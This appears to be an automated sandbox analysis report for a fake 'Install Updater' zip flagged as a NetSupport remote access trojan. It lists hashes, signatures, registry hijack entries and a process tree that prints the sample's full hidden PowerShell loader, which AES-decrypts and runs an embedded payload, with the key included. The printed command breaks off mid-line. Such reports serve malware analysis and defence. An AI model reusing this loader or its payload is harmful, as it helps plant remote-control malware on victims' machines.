Analysis
-
max time kernel
141s -
max time network
206s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
18/07/2023, 03:25
Static task
static1
Behavioral task
behavioral1
Sample
Install Updater (V104.551.2)-stable.zip
Resource
win10v2004-20230703-en
General
-
Target
Install Updater (V104.551.2)-stable.zip
-
Size
4.7MB
-
MD5
fbe7dec7fbb2ab938fb68c68311a4168
-
SHA1
08326c945c66fc4ed00e818913258905efbe8495
-
SHA256
ab08ba5cb3eb0ef2cffeecefe99023bf0f080f19cfe0187892f5b08f41345e39
-
SHA512
ffa6445d59b07ab31c33aaef1befb1a409140f17d7e1931f8247f409a27b5960f34f48a203fc262acd487c4aef9f969f8d5cf0a3dbabf36b8faca362cf78f5f1
-
SSDEEP
98304:86OGtHcG/ILJjjSQ8ByUBIPoVs+90eNDzumoYQBcnG3:86O4HcuI1jHJwVVCeN/umvQcnE
Malware Config
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 57 2944 powershell.exe 60 2944 powershell.exe 66 2944 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 1844 client32.exe -
Loads dropped DLL 5 IoCs
pid Process 1844 client32.exe 1844 client32.exe 1844 client32.exe 1844 client32.exe 1844 client32.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
pid Process 4696 taskkill.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E} reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\IonicBaseband\\client32.exe" reg.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 1368 powershell.exe 1368 powershell.exe 2944 powershell.exe 4572 powershell.exe 2944 powershell.exe 4572 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4784 powershell.exe 4596 powershell.exe 4596 powershell.exe 4596 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 4572 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 powershell.exe Token: SeSecurityPrivilege 4596 powershell.exe Token: SeTakeOwnershipPrivilege 4596 powershell.exe Token: SeLoadDriverPrivilege 4596 powershell.exe Token: SeSystemProfilePrivilege 4596 powershell.exe Token: SeSystemtimePrivilege 4596 powershell.exe Token: SeProfSingleProcessPrivilege 4596 powershell.exe Token: SeIncBasePriorityPrivilege 4596 powershell.exe Token: SeCreatePagefilePrivilege 4596 powershell.exe Token: SeBackupPrivilege 4596 powershell.exe Token: SeRestorePrivilege 4596 powershell.exe Token: SeShutdownPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeSystemEnvironmentPrivilege 4596 powershell.exe Token: SeRemoteShutdownPrivilege 4596 powershell.exe Token: SeUndockPrivilege 4596 powershell.exe Token: SeManageVolumePrivilege 4596 powershell.exe Token: 33 4596 powershell.exe Token: 34 4596 powershell.exe Token: 35 4596 powershell.exe Token: 36 4596 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 powershell.exe Token: SeSecurityPrivilege 4596 powershell.exe Token: SeTakeOwnershipPrivilege 4596 powershell.exe Token: SeLoadDriverPrivilege 4596 powershell.exe Token: SeSystemProfilePrivilege 4596 powershell.exe Token: SeSystemtimePrivilege 4596 powershell.exe Token: SeProfSingleProcessPrivilege 4596 powershell.exe Token: SeIncBasePriorityPrivilege 4596 powershell.exe Token: SeCreatePagefilePrivilege 4596 powershell.exe Token: SeBackupPrivilege 4596 powershell.exe Token: SeRestorePrivilege 4596 powershell.exe Token: SeShutdownPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeSystemEnvironmentPrivilege 4596 powershell.exe Token: SeRemoteShutdownPrivilege 4596 powershell.exe Token: SeUndockPrivilege 4596 powershell.exe Token: SeManageVolumePrivilege 4596 powershell.exe Token: 33 4596 powershell.exe Token: 34 4596 powershell.exe Token: 35 4596 powershell.exe Token: 36 4596 powershell.exe Token: SeIncreaseQuotaPrivilege 4596 powershell.exe Token: SeSecurityPrivilege 4596 powershell.exe Token: SeTakeOwnershipPrivilege 4596 powershell.exe Token: SeLoadDriverPrivilege 4596 powershell.exe Token: SeSystemProfilePrivilege 4596 powershell.exe Token: SeSystemtimePrivilege 4596 powershell.exe Token: SeProfSingleProcessPrivilege 4596 powershell.exe Token: SeIncBasePriorityPrivilege 4596 powershell.exe Token: SeCreatePagefilePrivilege 4596 powershell.exe Token: SeBackupPrivilege 4596 powershell.exe Token: SeRestorePrivilege 4596 powershell.exe Token: SeShutdownPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeSystemEnvironmentPrivilege 4596 powershell.exe Token: SeRemoteShutdownPrivilege 4596 powershell.exe Token: SeUndockPrivilege 4596 powershell.exe Token: SeManageVolumePrivilege 4596 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1844 client32.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 1472 wrote to memory of 1368 1472 mshta.exe 101 PID 1472 wrote to memory of 1368 1472 mshta.exe 101 PID 1472 wrote to memory of 1368 1472 mshta.exe 101 PID 1368 wrote to memory of 3564 1368 powershell.exe 104 PID 1368 wrote to memory of 3564 1368 powershell.exe 104 PID 1368 wrote to memory of 3564 1368 powershell.exe 104 PID 3564 wrote to memory of 4572 3564 cmd.exe 107 PID 3564 wrote to memory of 4572 3564 cmd.exe 107 PID 3564 wrote to memory of 4572 3564 cmd.exe 107 PID 3564 wrote to memory of 2944 3564 cmd.exe 106 PID 3564 wrote to memory of 2944 3564 cmd.exe 106 PID 3564 wrote to memory of 2944 3564 cmd.exe 106 PID 2944 wrote to memory of 4784 2944 powershell.exe 109 PID 2944 wrote to memory of 4784 2944 powershell.exe 109 PID 2944 wrote to memory of 4784 2944 powershell.exe 109 PID 4784 wrote to memory of 3228 4784 powershell.exe 110 PID 4784 wrote to memory of 3228 4784 powershell.exe 110 PID 4784 wrote to memory of 3228 4784 powershell.exe 110 PID 3228 wrote to memory of 2796 3228 csc.exe 111 PID 3228 wrote to memory of 2796 3228 csc.exe 111 PID 3228 wrote to memory of 2796 3228 csc.exe 111 PID 4784 wrote to memory of 2188 4784 powershell.exe 112 PID 4784 wrote to memory of 2188 4784 powershell.exe 112 PID 4784 wrote to memory of 2188 4784 powershell.exe 112 PID 3548 wrote to memory of 4596 3548 DllHost.exe 114 PID 3548 wrote to memory of 4596 3548 DllHost.exe 114 PID 3548 wrote to memory of 4596 3548 DllHost.exe 114 PID 4596 wrote to memory of 364 4596 powershell.exe 116 PID 4596 wrote to memory of 364 4596 powershell.exe 116 PID 4596 wrote to memory of 364 4596 powershell.exe 116 PID 4596 wrote to memory of 1844 4596 powershell.exe 118 PID 4596 wrote to memory of 1844 4596 powershell.exe 118 PID 4596 wrote to memory of 1844 4596 powershell.exe 118 PID 3548 wrote to memory of 4696 3548 DllHost.exe 119 PID 3548 wrote to memory of 4696 3548 DllHost.exe 119 PID 3548 wrote to memory of 4696 3548 DllHost.exe 119
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Install Updater (V104.551.2)-stable.zip"1⤵PID:1112
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1392
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Install Updater (V104.551.2)-stable.zip\Install Updater (V104.551.2)-stable.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell - }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe $uGSyEn = 'AAAAAAAAAAAAAAAAAAAAAPJlV3B1NhOYx3YVPpROLxNgaqL3qbdqyDshP+EuM5BY9U8ASIdSQGeEapX4ZZq7MccZfiZsI5TOvL/mZyPW+LsKs+zH8Xaw0XTtBFHBZeSWSHL5/q0MMmgIupTCSCfAg3u5vX5SH/4/1JZrK64q9gOJG5U3WXxsCd5fNkp9lxqQu9/Ke6QzKyXVADPmAXkzGyX4uUFQwTZKLjhzI16nB8fCYrFkEKZa7KVY68MiJMgAjG2yzQ4/DGStADYNF6DA0xDhemQLqlq8oDHDp114wKw390YCnP8OOPtTWb7Jxy33NLqzS5smWNQXVbMlZonbIbk4HTvfcBaaknbmSgIyY9myxQ0nhCeNNRYPNnnQWi+9Nv8b672212xu8rK7zM5ELy8w7kTdQJq0iwS2e5FiCmBBvwM6ja3Wi/VLULGk2nS8qbiTnNWzq3W6thTfTgDPpRL5wSg9XybFluV502aH1b1mbHToRQVWcOB+MtuaiGGmztKTWGN7pj+pHng97kl0vACDSWiC2zvS3nsucGBiM+yVWe2Jc1jejGTnT84tVcTKr/k4UJy2Dj3mz/K53w/8RMlNqMG0QPrGNlq1vvYMt1imL4+rNH49Vgr/wJAGNewpLiRSnLeiLws7lg8NQ2lChltLoK80QjU0/wgrtEmfzbcMigmkxHUlgiSIv9+MqvEuMnA8PqtOt/hHoi9O1zcmTkBsVyDbv3x02zAc8s5QYuNXrj2l+VXCwfWJgS/cyd1XRNCKKo/HzwlKgHycr15LiegLsh1vn5JGHgsiydTbBEHZMf8A/2dORoe/sL02oebQtEzzP2l+hqVP0hvhLaFuQfpg/6gTAlHHmeG5sSfXybeQgnsQFgnU/P7T9saaD6xhAjTpacIIohCdGRurCMPomSiLx2E+PZfCQJt9wN/MBtMXyMNp8Ap3xhxEEej4vYCjoNq0bHciaivvMOZnjVLfmxRBlpkGbIm/7iE/43Bgl2hj9evceUBKPUHOjJF29jSp1oIr6jJGcoUVXLLfuAXEvrSGmc0kxajGHw5tNkQ8xsg40qvp5ToXmuLz8xyjn0MZhLBh9iqlo+Ww/K7jAW2c6/U4RTO8FXtkFN3yaqYECTAawuwdYJrpEzBCnIiUBtVYItgPQYJ3+Rqh/i8x5lxireJFPJt1o9LoYGNli+HMazc0xjyI7cEE+eEbI+jicXVRy7noLNNKdSw8eh8eYqA5sjJQM2Nu6NGN/dRC+vFEzzxOaYVNR/Dl+7LZ1dsq0SKMqasNRLIJCUiW54ZLiFAjGJRN+3MZe38YE2KSEQaEcrcbH2/mHN0l0cY4Yuh34l8MkdbF+1DpFhAWtawBaVRJcJX1fjUG4Fd5oF2HqfQ1QpnGe9t9f12r5k4zkuidjH9fRoYNptt+IYPaOgXhlcg04iGrhE6/x5r4PT9x/1WDKIFnbgvXqw0LK7yGQRe+Qm0X8FDmfBkrqeKIEig4kITCnT6dyTu73InuFskasdGiov5Oxib3+Jy7L/A3r1vSnCIQfd3yzsRaxfj4JPjVWCOYONiNw5KOKqNoFrZlhuphQkn+ECqpABKTisjzCRwVb+g2D4uNe3pEybbAVa0d9yCKlhivKXIsgbcZZfEVnONk76wzrCD9FXY6/ZdNmUvqd1J0rMDPtiqpGuYfwOPhlkEfamNhx7r48pW2BZLhV61klwDb+5UXlyhcyz4PdOlOE+YVP/CoXm7eYad92E52MQPOMqatGBUX6Br0E0gqYzTXA+ttV3dSPn0Vlhv2SxrVuimlZU9Z6qeiSHiNg50t5s2nRUti+/j/mxJqyNHfERBvrMJe+biesmgiM530+uHMbKKzv784nEgISu7qe4+fZknfBhT1VQmEUXtLhitB3wtyQ6DqxRPpjZ22wcIkBpaUlsK+1APrve/AdE/G7yAnLUWuxOIZpsk7X4eMfd7nvZYRJ3acYIXL3HWKRI88F6eYl3Ins2vPnYDbV3F0FX6XbTqdDYCvdy62/NgWs02bDdBevko2tt1UtcG0hYutuOgbZ5hRBgptVGJ4AUuTP3bwz3pwnj2vV31sHuqsWjPW9ANthuoWx5xNjbp5bMcF7WHsOmAsccFWVlBKUyH9b2VL44huVrmKT9N182utrWTzCuQe5OG6tPdfQ5A8VPIOs6TS/qhZ0R/l7Fg1COr5eEyJnzYoqHF16Nk60O5EOBo9+T/RrwMzwuQnFtA3AIC45pBrHkOxH4PB1M9MqPRFJOXn5fAIXLmmauoC/SQ7tmY/55eaps0Fi+K48B+4tVWPXoj1yQTDUiPAOpOYOxqGL1Ma5lRKNAdZrXwi64S6zN2sgO0grqSR+OVrXSyuHU3zE75CQzKL0NyFtqotzPPITyAYWWVMKQZjCrAzB+jxcJkGTLI+b3fjXxnae8UIQsli0ZJW+FGTst9NXCUZ9xhvgnCUGu2PjLj8uDGmlnnC7W3m1jV6E8mAVT5/kKqfayDFfT9KcNO2sINm/Bszhb7nSGsGBydHBcm/zdVwX+QwIOob2r3c5KTk1TYGpZwQ4Wmaqw21P+9XS0f46Q+vPKoe2Uqn6m39ch8WXEfYK0YeDSxaX9vDXdBCG1jHKBUKBpr8lsmgUMYv+XFQyP+9PFkeQubE4TxWcRIhchDe22d2+0R+GmXx8LBgrq2+4ZoDkNnD9/ThD269G255Q8KE76Z/xAoPr+JCFGiplU/Y4ZEW9WQfcK/56qyl3qWD8rZgo+tpaKHcWI4Rz47W56LO7nmGKdy5hZ1Yv5JQ+Mzm6T9qhZWBrRvOShwRB37EK1Qk4ulSkZBks4sbk4b1+eaQDrTZNlCdDqAYPuRgg+tci2Re+kj0nJX4qS8K6g0Nd1Ea0Aqd/VRyKMeZbxVakjm4swRJWDvfeAZCO1wi8ldRBOjISvLwrbGkZ6RCgHdrmT9dh9TVNMUX997skUsrRyq1g9I6rbRtGs9ze/9aZKHMJEXNsQAz3crUgVXSmNYm/zVpPK/zZkAid9KOg8yO3bdDXLzTNZ12QtX+sfeZQWrT6bh0t3Wvz0R+wpEjhw86LgrJvu8ATsT0rnz0LpLDixbcsf0UWND0D4Vtzum2LNJInbjx5rOZqqZkRbUQI4UgWMzXhOJUdH61bD+mQFjksH6tyuTOMDrxDCwwnJSZ6kV83Qq0BmTzHYdRMC4FjPOod1QsfsLy4uYmaAtBYmX5d0CBPXdGQJY+d16fAkiS4EEq71SBo1+MlEhjODiT4DoN4f5AJn67jyDA4cnE5ly8LyvMLRnj6p7mO/F6wClJJ1CDNOyOGOpOSocM8Jng1hfCxtfLZUioyP4Lhd0vdtR/b+y6DRLOY9wJdigYsiEz1h6lWwm6fW0IYz5FefsFbJ+sPX+fH3BC1Jse4p0w4pBj8ziqRRaxAxlUdhBKRPfGuZU0EIIWoSIPnQwuh0aRD5jyq99CiaV0Gzq5HVDIrQ3LbUOF7VSmmsVv1ON8TESZ8fs13bScVJmkcYGpXsoP8iJLeBigIZh2synd/TLxyCo+kcnRjg5QXDbfW9rk45uy49UFlKd25+ulQjPZNSRkhKJMgrhT3thzCFCuURy6f/0DJMTBbadn2/rmixiX+7eFYwoZP4yaqgy3MNNvrN/NM3qHUkOAi65UnxZOyHpv6Oyb2O8iI8PTMFubKKhGL6ojHZgVC7V4cIOcp0izBUyRZj2H9aL1A6RQQIr4iy6i54EYVvgHDTkhgejoPcLd4pkpWjsZh0/cAnb8Y26EuPY+H9i1gJtUtI/Ih/5whUgWJdaBf+X9p1g8D98DLeLV4BlCe1Qz1OvtKCITeFX0HFIjMdEbVQZWIawvBGwfJFmyNzi1AiHOebecIjy97rI5jlMF1OldZFVo0uk1hhKxnaTFk7eMq45BsDsNZPaumaCbecYpAVlEtSdsx98tPHbZ3ysYTG9A/ooejgSSLcLvFXjNYKUF36biCkhsLzHz6hUz9/Mb56eOBW/0u43L4UYH60styVu2GcUA8eoBSB8RpZs26W3boUMgndpD529JKLQhcRd4tVP+DfW/n0W5ivyqtRbP24B1l0V6YTH6v//RYPjvb9wNRQtWRFFQD9tax8K/ejY4Ijv5Tfjt/iGuObaqR3xZbkKWtxl6L8vYY6M4ym1U/uLFFqZCK6yPHgo3OiKrQjDy5H2NCX08qGIihRhwVgp0AsLJ3jbcVaucCIP+pb/ccGSPqiHFOcnYsKvBw9XDkE5ugqBPxYB0uCNcX2KRzc57KAOBS9DB+pPOBf13XrQIlDcb1dpIsTzDhX651PzBp1B4VXaJD7OtQdgfIkfhabJ/7QA+TyjHG+q7KZRFLRlWahTMRayEH0FhAGosXrSBnywhWBQAGTfhlrvZUZIbjQvqhHkQlYcCOEnlFL0W9Z3Is2OR8az8HW+b2ISkOZvp';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 